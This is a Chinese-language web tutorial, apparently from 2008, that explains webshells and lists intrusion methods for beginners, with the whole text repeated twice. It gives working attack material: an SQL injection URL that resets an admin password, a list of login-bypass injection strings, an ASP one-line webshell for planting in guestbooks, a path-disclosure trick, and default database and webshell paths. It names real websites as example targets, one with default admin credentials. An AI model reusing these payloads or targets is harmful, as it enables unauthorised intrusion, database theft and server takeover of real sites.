非常不錯的腳本入侵基礎知識總結第1/2頁
更新時間:2008年06月14日 19:51:12 作者:
簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網站后,常常在將這些 asp或php木馬后門文件放置在網站服務器的web目錄中,與正常的網頁文件混在一起。
一.Webshell是什么?這是很多朋友在疑惑的問題,
什么是webshell?今天我們就講講這個話題!
webshell是web入侵的腳本攻擊工具。
簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網站后,常常在將這些 asp或php木馬后門文件放置在網站服務器的web目錄中,與正常的網頁文件混在一起。然后黑客就可以用web的方式,通過asp或php木馬后門控制網站服務器,包括上傳下載文件、查看數據庫、執(zhí)行任意程序命令等。</P>
為了更好理解webshell我們學習兩個概念:
什么是“木馬”?“木馬”全稱是“特洛伊木馬(Trojan<BR>Horse)”,原指古希臘士兵藏在木馬內進入敵方城市從而占領敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設計人員在其可從網絡上下載 (Download)的應用程序或游戲中,包含了可以控制用戶的計算機系統(tǒng)的程序,可能造成用戶的系統(tǒng)被破壞甚至癱瘓。
什么是后門?大家都知道,一臺計算機上有65535個端口,那么如果把計算機看作是一間屋子,那么這65535個端口就可以它看做是計算機為了與外界連接所開的65535 扇門。每個門的背后都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉著的,但偏偏由于各種原因,很多門都是開啟的。于是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。
webshell的優(yōu)點
webshell 最大的優(yōu)點就是可以穿越防火墻,由于與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的,因此不會被防火墻攔截。并且使用webshell一般不會在系統(tǒng)日志中留下記錄,只會在網站的web日志中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入<BR>
2,使用注入工具<BR>
3,在瀏覽器里打開百度,輸入搜索關鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執(zhí)行一個操作",然后點擊搜索,很快就可以看到檢索到了大量的查詢結果.<BR>其他的東西,暫時不多說了,以后再深入吧,每天準備一個話題,需要的是巨大的毅力和努力,我們舉辦的每日講座就是為了通俗容易懂的普及信息安全知識,讓不喜歡看文章,覺得信息安全知識很深奧枯燥的人都明白,其實他只要花很少時間,就可以了解很多信息安全知識!
二.菜鳥學習入侵的14種可利用方法
作者:佚名 文章來源:本站原創(chuàng) 點擊數:560 更新時間:2006-8-9
1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數據庫].那么我們可以用以下命令:
http://注入網址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin為表名.]
3.旁注,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然后在利用這個站點用提權,嗅探等方法來入侵我們 要入侵的站點。,在這里有個難點,就是一些服務器的絕對路徑經過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
如果你能看到:'E:\test\test\database\test.asa'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.
5.'or'='or'這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社會工程學。這個我們都知道吧。就是猜解。
7.寫入ASP格式數據庫。就是一句話木馬[<%execute request("value")%> ],常用在留言本.
EY:http://www.scbzlx.com/book/book.asp[這個就是ASP格式的數據庫],再寫入一句話木馬
8.源碼利用:一些網站用的都是網上下載的源碼.有的站長很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個站用的是:杰出校友錄,源碼我下過了,
默認數據庫/webshell路徑:\database\liangu_data.mdb 后臺管理:adm_login.asp 密碼及用戶名都是admin
9.默認數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網站獵手 挖掘雞
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
什么是webshell?今天我們就講講這個話題!
webshell是web入侵的腳本攻擊工具。
簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網站后,常常在將這些 asp或php木馬后門文件放置在網站服務器的web目錄中,與正常的網頁文件混在一起。然后黑客就可以用web的方式,通過asp或php木馬后門控制網站服務器,包括上傳下載文件、查看數據庫、執(zhí)行任意程序命令等。</P>
為了更好理解webshell我們學習兩個概念:
什么是“木馬”?“木馬”全稱是“特洛伊木馬(Trojan<BR>Horse)”,原指古希臘士兵藏在木馬內進入敵方城市從而占領敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設計人員在其可從網絡上下載 (Download)的應用程序或游戲中,包含了可以控制用戶的計算機系統(tǒng)的程序,可能造成用戶的系統(tǒng)被破壞甚至癱瘓。
什么是后門?大家都知道,一臺計算機上有65535個端口,那么如果把計算機看作是一間屋子,那么這65535個端口就可以它看做是計算機為了與外界連接所開的65535 扇門。每個門的背后都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉著的,但偏偏由于各種原因,很多門都是開啟的。于是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。
webshell的優(yōu)點
webshell 最大的優(yōu)點就是可以穿越防火墻,由于與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的,因此不會被防火墻攔截。并且使用webshell一般不會在系統(tǒng)日志中留下記錄,只會在網站的web日志中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入<BR>
2,使用注入工具<BR>
3,在瀏覽器里打開百度,輸入搜索關鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執(zhí)行一個操作",然后點擊搜索,很快就可以看到檢索到了大量的查詢結果.<BR>其他的東西,暫時不多說了,以后再深入吧,每天準備一個話題,需要的是巨大的毅力和努力,我們舉辦的每日講座就是為了通俗容易懂的普及信息安全知識,讓不喜歡看文章,覺得信息安全知識很深奧枯燥的人都明白,其實他只要花很少時間,就可以了解很多信息安全知識!
二.菜鳥學習入侵的14種可利用方法
作者:佚名 文章來源:本站原創(chuàng) 點擊數:560 更新時間:2006-8-9
1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數據庫].那么我們可以用以下命令:
http://注入網址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin為表名.]
3.旁注,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然后在利用這個站點用提權,嗅探等方法來入侵我們 要入侵的站點。,在這里有個難點,就是一些服務器的絕對路徑經過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
如果你能看到:'E:\test\test\database\test.asa'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.
5.'or'='or'這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社會工程學。這個我們都知道吧。就是猜解。
7.寫入ASP格式數據庫。就是一句話木馬[<%execute request("value")%> ],常用在留言本.
EY:http://www.scbzlx.com/book/book.asp[這個就是ASP格式的數據庫],再寫入一句話木馬
8.源碼利用:一些網站用的都是網上下載的源碼.有的站長很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個站用的是:杰出校友錄,源碼我下過了,
默認數據庫/webshell路徑:\database\liangu_data.mdb 后臺管理:adm_login.asp 密碼及用戶名都是admin
9.默認數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網站獵手 挖掘雞
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
相關文章
win2003下創(chuàng)建永遠的隱藏帳戶的圖文教程
win2003下創(chuàng)建永遠的隱藏帳戶的圖文教程...2007-11-11

